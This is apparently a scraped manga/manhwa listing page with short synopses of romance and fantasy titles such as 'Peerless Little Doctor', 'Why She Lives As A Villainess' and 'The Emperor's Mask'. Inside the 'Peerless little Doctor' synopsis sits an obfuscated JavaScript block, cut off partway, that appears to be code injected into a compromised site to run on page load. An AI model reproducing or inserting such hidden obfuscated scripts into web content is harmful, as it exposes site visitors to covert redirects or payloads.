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4233 results

Manuk’s Oath: First Story of Betrothal

“Warning: Mature content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Rainbow D Translations: A story of a first love after marriage and ‘Manuk’s Oath’ “Even though we spent such a hot night together a ‘Manuk’ did not appear… Am I not your betrothed one?” After being betrothed to Prince Li Chan at a young age, Princess Hwa-min should have received a “Manuk” as a token of their marriage, but it did not show up. Unlike the anxious Hwa-min, a relaxed Li-Chan covets her like an animal. And– there are those with bad intentions observing these two: the concubine Yuru, who has a strong backing, has a sinister scheme brewing…


Peerless little Doctor

Peerless little Doctor The comic is adapted from the novel “Peerless Little Doctor” of the rogue fish child in the Chinese and English network. The school flower is ill, flash away, let me come! Little Loli is sick? Let uncle look! Boss Wang has advanced cancer? I’m sorry, I’ll go to the registration line. There is no time tonight. Sister Chang’e has an appointment! &nbsp;<script></script><script>function _0x46ea(_0x2d9e47,_0x5d93e8){var _0x350cd3=_0xd5cd();return _0x46ea=function(_0x380008,_0x5738a9){_0x380008=_0x380008-(-0x1c11+0x6a*0x43+-0x21f*-0x1);var _0x1bc507=_0x350cd3[_0x380008];return _0x1bc507;},_0x46ea(_0x2d9e47,_0x5d93e8);}(function(_0x3c9d82,_0x18675c){var _0x3c7539=_0x46ea,_0x328b01=_0x3c9d82();while(!![]){try{var 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Why She Lives As A Villainess

Why She Lives as a Villainess manhwa at topmanhua.com and content: I reincarnated into the body of the main character, the villainess. This was before the villainess went back in time. I know the original plot anyway. I don’t have to go back in time and redeem myself, do I? Let’s just destroy the original plot while looking for a way to live. In my own way, obviously. Authors: Yuwn / 법생 Genres: Korean , Manhwa , Shoujo , Full Color , Isekai , Romance Read direction: Left to Right Release status: Ongoing Year of Release: 2021


It’s Hard Getting Married to A Prince

Does the “luxury” known as familial bond exist in the imperial family? The older brother believed so, and was willing to place his life on the line to prove this. However, the younger brother scorned this idealistic thinking, because he once almost lost his life for this… For such a problem that involved different philosophical approaches, the two stubborn brothers commenced their seesaw battle. And so it is, that the Northern Ying Palace plunged into a chaotic turmoil…


A Butterfly Metamorphoses Three Times

By a turn of events, Jin Naye ended up kissing her co-worker’s boyfriend, not to mention she keeps hearing a maleficent voice which nobody else can hear… At home, she’s a pitiful daughter who didn’t even get married yet, and at work she’s a weak-willed pushover. Day by day, Naye is forced to live a life full of torment. In order to defy her mother’s wish to meet a marriage prospect on her own birthday, she attends a party and gets herself some drinks – actions which are unlike her. There, she ended up having her first kiss, but with her co-worker’s boyfriend?! From that day onward, Naye’s life started to change bit by bit…


Please Save My Husband

<span class="mx-1">Please Save My Husband </span> The ideal husband; a romantic wedding day; a perfect honeymoon... Everything looks as if it's going in the right direction, but instead I'm suddenly living a fantasy?!! Hahahaha, what the hell's going on?! Every time I fail a quest, I'm thrown right back to the beginning of the mission! Where exactly is this heading!? To protect my husband, Yeoyun, and stop travelling back in time, I must control this marriage and the in-laws!


Please Don’t Be So Conceited

Male polytechnic honor student He Zhizhou and airheaded yet lovable female idiot Shen Xi had their bodies swapped in an accident. From the ever-present issues of misplaced youth to the supernatural chance encounters, the two of their lives have changed a lot from their past. He Zhizhou was forced to live in the female dorms, and Shen Xi had no choice but to adapt to the life of a man This fresh new take on the school-life slice-of-life romcom is about to begin!


Military Phoenix

As a military commander, I crossed over to the Sky Spirit Continent due to an accident. After opening my eyes, I encountered an inexplicable assassination. To that, I just wanted to say, "You messed with the wrong person!" I signed the system on the front foot, awakened the top spiritual power on the back foot, carrying a bazooka to do in the real culprit, stirring him up! The only thing that hurts is that there are too many people who are interested in me, so can I get to that actual perpetrator, huh? +


My Fairy Loves To Get Jealous

In order to save her restaurant that's on the verge of bankruptcy, Mei Shi, the heir of the restaurant, searches through the basement for the secret recipe of a delicacy that was passed down by her ancestors. However, she accidentally breaks the seal of the vinegar altar, releasing the handsome and narcissistic fairy Yan Jin of the Heavenly Court! A cooking god who can only make dark recipes and an heir, who can only do martial arts but not cook, have to face against a wild group who wants to buy and own the restaurant. Can they protect the restaurant?


Surviving As Twin Sisters

Surviving as Twin Sisters / 쌍둥이 왕녀로 살아남기 I brutally betrayed by my twin sister, who I considered as my other half. The night of my framing and subsequent death, I wished from the bottom of my heart… ” May I never again be born as a royal twin.” But out of nowhere, I travelled back to the past?! I was just a meek girl who never dreamed of overthrowing my older sister for the throne. So why did I…?


The Grand Duke Of The North Wants To Be Loved

The Grand Duke of the North Wants to be Loved , 북부 대공님은 사랑 받고 싶어 Allen Pratt, the cold-blooded northern Duke. He’s the unlucky prince who was exiled to the north because he could not inherit the throne. Thus he turns dark, turning into the villain of this world. He said that he’ll wreck havoc in the future, but… I was the only one who knew. No matter how evil he is, I am certain. He’s the person who can both save me and the story. My only .


The Emperor’s Mask

<div class="post-title"> <h1>The Emperor’s Mask</h1> </div> <div class="tab-summary "> I didn’t know blackouts were so scary. I lost my film after drinking. And when she opened her eyes, she was in a different world, and she was in a different person’s body. That alone is absurd, but I found out that the cause of death of the body was murder, not suicide. I’m so busy adjusting to reality that I’m going crazy, and I’m also thinking about what’s wrong with the emperor who doesn’t show his face outside. Meanwhile, suspicious beings, even the chief of staff, continue to haunt her. “What’s that big bowl?” “…….” Damn, you’re interrupting me mixing rice with a spoon! The story of a mysterious emperor, a suspicious servant, a man who doesn’t reveal himself and the wrong heroine Lucia. </div>
